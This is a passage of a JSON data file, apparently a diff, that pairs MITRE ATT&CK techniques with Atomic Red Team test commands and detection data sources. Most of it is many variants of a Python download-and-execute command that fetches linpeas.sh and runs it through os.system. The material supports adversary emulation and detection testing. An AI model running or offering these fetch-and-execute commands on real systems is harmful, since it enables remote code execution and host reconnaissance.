"data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1059.006", + "command_list": [ + "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\";malicious_command = \"#{executor} #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} T1059.006-payload #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"T1059.006-payload\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"sh #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"#{script_url}\"' >> T1059.006.py\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python T1059.006.py\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} T1059.006-payload #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"sh #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"#{script_url}\"' >> T1059.006.py\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python -c 'import py_compile; py_compile.compile(\"T1059.006.py\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} T1059.006-payload #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"sh #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"T1059.006.pyc\")'\n$which_python T1059.006.pyc\n" + ], + "commands": [ + { + "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\";malicious_command = \"#{executor} #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} T1059.006-payload #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"T1059.006-payload\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"sh #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"#{script_url}\"' >> T1059.006.py\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python T1059.006.py\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} T1059.006-payload #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"sh #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"#{script_url}\"' >> T1059.006.py\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python -c 'import py_compile; py_compile.compile(\"T1059.006.py\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} T1059.006-payload #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"sh #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"T1059.006.pyc\")'\n$which_python T1059.006.pyc\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.006", + "display_name": "Command and Scripting Interpreter: Python", + "atomic_tests": [ + { + "name": "Execute shell script via python's command mode arguement", + "auto_generated_guid": "3a95cdb2-c6ea-4761-b24e-02b71889b8bb", + "description": "Download and execute shell script and write to file then execute locally using Python -c (command mode)", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "script_url": { + "description": "Shell script public URL", + "type": "String", + "default": "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh" + }, + "payload_file_name": { + "description": "Name of shell script downloaded from the script_url", + "type": "String", + "default": "T1059.006-payload" + }, + "executor": { + "description": "Linux shell", + "type": "String", + "default": "sh" + }, + "script_args": { + "description": "Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.", + "type": "String", + "default": "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Verify if python is in the environment variable path and attempt to import requests library.", + "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "get_prereq_command": "pip install requests\n" + } + ], + "executor": { + "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "name": "sh", + "cleanup_command": "rm #{payload_file_name} \n" + } + }, + { + "name": "Execute Python via scripts (Linux)", + "auto_generated_guid": "6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8", + "description": "Create Python file (.py) that downloads and executes shell script via executor arguments", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "python_script_name": { + "description": "Python script name", + "type": "Path", + "default": "T1059.006.py" + }, + "script_url": { + "description": "Shell script public URL", + "type": "String", + "default": "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh" + }, + "payload_file_name": { + "description": "Shell script file name downloaded from the script_url", + "type": "String", + "default": "T1059.006-payload" + }, + "executor": { + "description": "Payload or script interpreter / executor", + "type": "String", + "default": "sh" + }, + "script_args": { + "description": "Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files", + "type": "String", + "default": "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "get_prereq_command": "pip install requests \n" + } + ], + "executor": { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "name": "sh", + "cleanup_command": "rm #{python_script_name} #{payload_file_name} \n" + } + }, + { + "name": "Execute Python via Python executables (Linux)", + "auto_generated_guid": "0b44d79b-570a-4b27-a31f-3bf2156e5eaa", + "description": "Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "python_script_name": { + "description": "Name of Python script name", + "type": "Path", + "default": "T1059.006.py" + }, + "script_url": { + "description": "URL hosting external malicious payload", + "type": "String", + "default": "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh" + }, + "payload_file_name": { + "description": "Shell script file name downloaded from the script_url", + "type": "String", + "default": "T1059.006-payload" + }, + "executor": { + "description": "Payload or script interpreter / executor", + "type": "String", + "default": "sh" + }, + "script_args": { + "description": "Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files", + "type": "String", + "default": "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles" + }, + "python_binary_name": { + "description": "Name of Python file to be compiled", + "type": "Path", + "default": "T1059.006.pyc" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "get_prereq_command": "pip install requests \n" + } + ], + "executor": { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "name": "sh", + "cleanup_command": "rm #{python_binary_name} #{python_script_name} #{payload_file_name}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1069.001", + "command_list": [ + "if [ -x \"$(command -v dscacheutil)\" ]; then dscacheutil -q group; else echo \"dscacheutil is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v dscl)\" ]; then dscl . -list /Groups; else echo \"dscl is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v 